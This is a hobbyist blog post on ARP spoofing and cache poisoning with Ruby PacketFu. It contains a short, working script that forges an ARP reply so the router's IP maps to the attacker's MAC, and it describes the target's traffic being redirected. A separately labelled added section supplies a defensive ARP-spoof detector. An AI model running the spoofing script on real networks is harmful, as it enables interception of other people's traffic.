
Ruby PacketFu: ARP Packet Spoofing and Cache Poisoning

My very good online friend Adam has been reading my recent PacketFu blog posts and today sent me the challenge of ARP cache poisoning. And what an excellent challenge it has been. I knew vaguely of ARP cache poisoning but nothing concrete, and so had to learn about the protocol, the principle of ARP packet spoofing and cache poisoning, and then figure out how to do the same in PacketFu. Boy, I’ve learnt a lot today.

Here’s how I did it:

require 'packetfu'

x = PacketFu::ARPPacket.new(:flavor => "Windows")  # new ARP packet object
x.eth_saddr = "04:7d:7b:c5:98:cf"      # attacking MAC address (Ethernet header)
x.eth_daddr = "00:0c:76:17:a4:17"      # target MAC address (Ethernet header)
x.arp_saddr_mac = "04:7d:7b:c5:98:cf"  # attacking MAC address (ARP sender)
x.arp_daddr_mac = "00:0c:76:17:a4:17"  # target MAC address (ARP target)
x.arp_saddr_ip = "192.168.1.254"       # "spoofed" router IP address
x.arp_daddr_ip = "192.168.1.79"        # target IP address
x.arp_opcode = 2                       # ARP "reply"
x.to_w('eth0')                         # put the packet on the wire

It all looks so simple laid out like this.

Once I rebooted the target machine and input arp -a in the command prompt the MAC address for the router IP had indeed changed to the attacking machine’s. The target machine’s traffic started flowing through Wireshark to the attacking machine.
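As an added example that is not part of the original post: a passive ARP-spoof detector in plain Ruby (no packetfu gem needed, so it runs offline) that parses the same 42-byte Ethernet/ARP frame layout the packet above puts on the wire and alerts when an ARP reply claims an IP under a MAC different from the one first learned, which is exactly the change arp -a revealed on the target. The router's real MAC (aa:bb:cc:00:00:01) and the 192.168.1.1 request are constructed placeholders; build_arp only assembles in-memory sample input and sends nothing.

```ruby
ETHERTYPE_ARP = 0x0806
ARP_REPLY     = 2

# Build a 42-byte Ethernet/ARP frame; used here only to construct sample input.
def build_arp(src_mac, src_ip, dst_mac, dst_ip, opcode = ARP_REPLY)
  mac = ->(m) { [m.delete(':')].pack('H*') }
  ip  = ->(a) { a.split('.').map(&:to_i).pack('C4') }
  mac[dst_mac] + mac[src_mac] + [ETHERTYPE_ARP].pack('n') +   # Ethernet header
    [1, 0x0800, 6, 4, opcode].pack('nnCCn') +                  # ARP header
    mac[src_mac] + ip[src_ip] + mac[dst_mac] + ip[dst_ip]      # sender/target
end

# Parse a raw frame; nil unless it is a well-formed Ethernet + IPv4 ARP frame.
def parse_arp(frame)
  return nil if frame.bytesize < 42 || frame[12, 2].unpack1('n') != ETHERTYPE_ARP
  _htype, _ptype, hlen, plen, opcode = frame[14, 8].unpack('nnCCn')
  return nil unless hlen == 6 && plen == 4
  { opcode: opcode,
    sha: frame[22, 6].unpack1('H*').scan(/../).join(':'),
    spa: frame[28, 4].unpack('C4').join('.') }
end

# Replay frames through a learned IP->MAC table and return an alert for every
# ARP reply that claims an IP under a different MAC than the one first learned.
# Passive learning trusts the first sighting, so seed the table with a known
# good mapping (e.g. the real router MAC) to avoid learning a forgery first.
def detect_arp_spoof(frames, table = {})
  alerts = []
  frames.each do |frame|
    arp = parse_arp(frame)
    next unless arp && arp[:opcode] == ARP_REPLY
    known = table[arp[:spa]]
    alerts << "#{arp[:spa]} moved from #{known} to #{arp[:sha]}" if known && known != arp[:sha]
    table[arp[:spa]] ||= arp[:sha]
  end
  alerts
end

# Constructed sample traffic: a reply from the real router (placeholder MAC),
# the forged reply from the post (router IP claimed by the attacking MAC), and
# an ordinary ARP request, which the detector must ignore.
SAMPLE_FRAMES = [
  build_arp('aa:bb:cc:00:00:01', '192.168.1.254', '00:0c:76:17:a4:17', '192.168.1.79'),
  build_arp('04:7d:7b:c5:98:cf', '192.168.1.254', '00:0c:76:17:a4:17', '192.168.1.79'),
  build_arp('04:7d:7b:c5:98:cf', '192.168.1.1', '00:0c:76:17:a4:17', '192.168.1.79', 1)
]

puts detect_arp_spoof(SAMPLE_FRAMES)  # prints "192.168.1.254 moved from aa:bb:cc:00:00:01 to 04:7d:7b:c5:98:cf"
```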

I could no longer access the Internet on the target machine and so the next stage would be forwarding the target machine traffic to the router.

But that’s for another day.

Thanks again to Adam, who bears the brunt every time I’m stuck with something and does so with extraordinary patience ;-)

UPDATE: I have blogged this, including infinite looping with 30-second intervals.
